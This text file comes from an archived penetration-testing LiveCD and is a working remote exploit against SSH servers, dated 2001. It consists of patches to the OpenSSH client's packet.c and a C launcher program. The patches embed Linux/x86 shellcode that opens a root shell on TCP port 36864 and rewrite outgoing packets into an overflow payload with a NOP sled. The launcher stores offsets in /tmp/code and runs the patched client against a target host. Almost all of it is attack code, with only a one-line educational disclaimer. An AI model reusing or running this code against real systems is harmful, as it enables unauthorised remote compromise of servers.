home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ssh / openssh / ssh-exploit-diffs.txt

< prev

next >

Wrap

Text File  |  2005-02-12  |  8KB  |  276 lines

---

1. # Exploit code in the form of ssh client patches by Hugo Dias < bsphere@clix.pt >.
2.  
3. - --- packet.c Sat Oct 14 06:23:12 2000
4. +++ packet.c Tue Feb 20 09:33:00 2001
5. @@ -68,6 +68,85 @@
6.  #define DBG(x)
7.  #endif
8.  
9. +
10. +/*
11. + *  Linux/x86
12. + *  TCP/36864 portshell (old, could be optimized further)
13. + */
14. +
15. +char shellcode[] = /* anathema <anathema@hack.co.za> */
16. +/* main: */
17. +"\xeb\x72"                                /* jmp callz               */
18. +/* start: */
19. +"\x5e"                                    /* popl %esi               */
20. +
21. +  /* socket() */
22. +"\x29\xc0"                                /* subl %eax, %eax         */
23. +"\x89\x46\x10"                            /* movl %eax, 0x10(%esi)   */
24. +"\x40"                                    /* incl %eax               */
25. +"\x89\xc3"                                /* movl %eax, %ebx         */
26. +"\x89\x46\x0c"                            /* movl %eax, 0x0c(%esi)   */
27. +"\x40"                                    /* incl %eax               */
28. +"\x89\x46\x08"                            /* movl %eax, 0x08(%esi)   */
29. +"\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
30. +"\xb0\x66"                                /* movb $0x66, %al         */
31. +"\xcd\x80"                                /* int $0x80               */
32. +
33. +  /* bind() */
34. +"\x43"                                    /* incl %ebx               */
35. +"\xc6\x46\x10\x10"                        /* movb $0x10, 0x10(%esi)  */
36. +"\x66\x89\x5e\x14"                        /* movw %bx, 0x14(%esi)    */
37. +"\x88\x46\x08"                            /* movb %al, 0x08(%esi)    */
38. +"\x29\xc0"                                /* subl %eax, %eax         */
39. +"\x89\xc2"                                /* movl %eax, %edx         */
40. +"\x89\x46\x18"                            /* movl %eax, 0x18(%esi)   */
41. +"\xb0\x90"                                /* movb $0x90, %al         */
42. +"\x66\x89\x46\x16"                        /* movw %ax, 0x16(%esi)    */
43. +"\x8d\x4e\x14"                            /* leal 0x14(%esi), %ecx   */
44. +"\x89\x4e\x0c"                            /* movl %ecx, 0x0c(%esi)   */
45. +"\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
46. +"\xb0\x66"                                /* movb $0x66, %al         */
47. +"\xcd\x80"                                /* int $0x80               */
48. +
49. +  /* listen() */
50. +"\x89\x5e\x0c"                            /* movl %ebx, 0x0c(%esi)   */
51. +"\x43"                                    /* incl %ebx               */
52. +"\x43"                                    /* incl %ebx               */
53. +"\xb0\x66"                                /* movb $0x66, %al         */
54. +"\xcd\x80"                                /* int $0x80               */
55. +
56. +  /* accept() */
57. +"\x89\x56\x0c"                            /* movl %edx, 0x0c(%esi)   */
58. +"\x89\x56\x10"                            /* movl %edx, 0x10(%esi)   */
59. +"\xb0\x66"                                /* movb $0x66, %al         */
60. +"\x43"                                    /* incl %ebx               */
61. +"\xcd\x80"                                /* int $0x80               */
62. +
63. +  /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
64. +"\x86\xc3"                                /* xchgb %al, %bl          */
65. +"\xb0\x3f"                                /* movb $0x3f, %al         */
66. +"\x29\xc9"                                /* subl %ecx, %ecx         */
67. +"\xcd\x80"                                /* int $0x80               */
68. +"\xb0\x3f"                                /* movb $0x3f, %al         */
69. +"\x41"                                    /* incl %ecx               */
70. +"\xcd\x80"                                /* int $0x80               */
71. +"\xb0\x3f"                                /* movb $0x3f, %al         */
72. +"\x41"                                    /* incl %ecx               */
73. +"\xcd\x80"                                /* int $0x80               */
74. +
75. +  /* execve() */
76. +"\x88\x56\x07"                            /* movb %dl, 0x07(%esi)    */
77. +"\x89\x76\x0c"                            /* movl %esi, 0x0c(%esi)   */
78. +"\x87\xf3"                                /* xchgl %esi, %ebx        */
79. +"\x8d\x4b\x0c"                            /* leal 0x0c(%ebx), %ecx   */
80. +"\xb0\x0b"                                /* movb $0x0b, %al         */
81. +"\xcd\x80"                                /* int $0x80               */
82. +
83. +/* callz: */
84. +"\xe8\x89\xff\xff\xff"                    /* call start              */
85. +"/bin/sh";
86. +
87. +
88.  /*
89.   * This variable contains the file descriptors used for communicating with
90.   * the other side.  connection_in is used for reading; connection_out for
91. @@ -125,6 +204,9 @@
92.  /* Session key information for Encryption and MAC */
93.  Kex *kex = NULL;
94.  
95. +/* Packet Number */
96. +int count = 0;
97. +
98.  void
99.  packet_set_kex(Kex *k)
100.  {
101. @@ -461,6 +543,8 @@
102.   unsigned int checksum;
103.   u_int32_t rand = 0;
104.  
105. + count++;
106. +
107.   /*
108.    * If using packet compression, compress the payload of the outgoing
109.    * packet.
110. @@ -1172,7 +1256,64 @@
111.  void
112.  packet_write_poll()
113.  {
114. - - int len = buffer_len(&output);
115. + int len;
116. + char buf[50],*p,*ptr;
117. + char code[270000];
118. + long sz;
119. + FILE *f; 
120. +
121. + if (count == 2)
122. + {
123. +  f = fopen("/tmp/code","r");
124. +  fgets(buf,28,f); 
125. +  fclose(f);  
126. +
127. +  sz = GET_32BIT(&buf[24]);
128. +  buffer_clear(&output);
129. +  buffer_append(&output,code,sz); 
130. + 
131. +  len = buffer_len(&output);
132. +
133. +    ptr = buffer_ptr(&output); 
134. +
135. +  for(p = ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=8)
136. +  {
137. +  *p=buf[0];
138. +  *(p+1)=buf[1];
139. +  *(p+2)=buf[2];
140. +  *(p+3)=buf[3];
141. +  *(p+4)=buf[4];
142. +  *(p+5)=buf[5];
143. +  *(p+6)=buf[6];
144. +  *(p+7)=buf[7];
145. +  }
146. +
147. +  sz = ((GET_32BIT(&buf[20]) + 8) & ~7);
148. +
149. +  for(p = p ; p < ptr + sz ; p+=8)
150. +  {
151. +  *p=buf[8];
152. +  *(p+1)=buf[9];
153. +  *(p+2)=buf[10];
154. +  *(p+3)=buf[11];
155. +  *(p+4)=buf[12];
156. +  *(p+5)=buf[13];
157. +  *(p+6)=buf[14];
158. +  *(p+7)=buf[15];
159. +  }
160. +
161. +  sz = len - GET_32BIT(&buf[20]);
162. + 
163. +  memset(p,'\x90',sz);
164. +  memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));
165. +  memcpy(ptr,&buf[20],4); 
166. +
167. +  count++;
168. + }
169. +
170. + len = buffer_len(&output);
171. +
172. +
173.   if (len > 0) {
174.    len = write(connection_out, buffer_ptr(&output), len);
175.    if (len <= 0) {
176. @@ -1299,3 +1440,4 @@
177.   max_packet_size = s;
178.   return s;
179.  }
180. +
181.  
182. - ------------------------------------------------------------------------------------
183.  
184. /* 
185.  
186. THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.
187.  
188. BlackSphere - Hugo Oliveira Dias
189. Tue Feb 20 16:18:00 2001
190.  
191. Email: bsphere@clix.pt
192. Homepage: http://planeta.clix.pt/bsphere
193.  
194. Exploit code for using the modified ssh
195.  
196. */
197. #include <stdio.h>
198. #include <stdlib.h>
199. #include <unistd.h>
200. #include <sys/types.h>
201. #include <sys/stat.h>
202. #include <fcntl.h>
203.  
204. /* Path to modified ssh */
205. #define PATH_SSH "./ssh"
206.  
207. int main(int argc,char *argv[])
208. {
209.  int f;
210.  int port;
211.  unsigned long addr,*ptr;
212.  char *buffer,*aux,ch,*ssh;
213.  int i;
214.  
215.  if (argc < 8)
216.  {
217.   printf("\nUsage : %s <saved eip> <count> <packet length> <username length> <host> \
218. <port> <h(i)>\n\n",argv[0]);
219.  
220.   fflush(stdout);
221.   _exit(0);
222.  }
223.  
224.  port=atoi(argv[6]);
225.  
226.  buffer = (char *) malloc(29);
227.  
228.  ptr = (unsigned long *) buffer;
229.  
230.  *(ptr++) = 1543007393 + strtoul(argv[1],0,10);
231.  *(ptr++) = 0;
232.  *(ptr++) = strtoul(argv[7],0,10);
233.  *(ptr++) = 0;
234.  *(ptr++) = 16520 + strtoul(argv[2],0,10);
235.  *(ptr++) = strtoul(argv[3],0,10);
236.  *(ptr++) = strtoul(argv[4],0,10);
237.  
238.  buffer[29]=0;
239.  
240.  for(i = 0 ; i < 27 ; i+=4)
241.  {
242.   aux = buffer + i;
243.   ch=*aux;
244.   *aux=*(aux+3);
245.   *(aux+3)=ch;
246.   ch=*(aux+1);
247.   *(aux+1)=*(aux+2);
248.   *(aux+2)=ch; 
249.  } 
250.  
251.  printf("\nSaved Eip : &h + %u",1543007393 + strtoul(argv[1],0,10));
252.  printf("\nReturn Address : 0x%xxxxx",(16520+strtoul(argv[2],0,10))/8);
253.  printf("\nPacket Length : %u",(strtoul(argv[3],0,10)+8) & ~7);
254.  printf("\nUsername Length : %u\n\n",strtoul(argv[4],0,10));
255.  fflush(stdout);
256.  
257.  
258.  f = open("/tmp/code",O_RDWR | O_CREAT,S_IRWXU);
259.  write(f,buffer,28);
260.  close(f);
261.  
262.  ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5]));
263.  
264.  strcpy(ssh,PATH_SSH);
265.  
266.  sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root %s",port,argv[5]);
267.  
268.  printf("%s\n",ssh);
269.  
270.  system(ssh);
271.  
272.  _exit(0); 
273. }
274.  
275.  
276.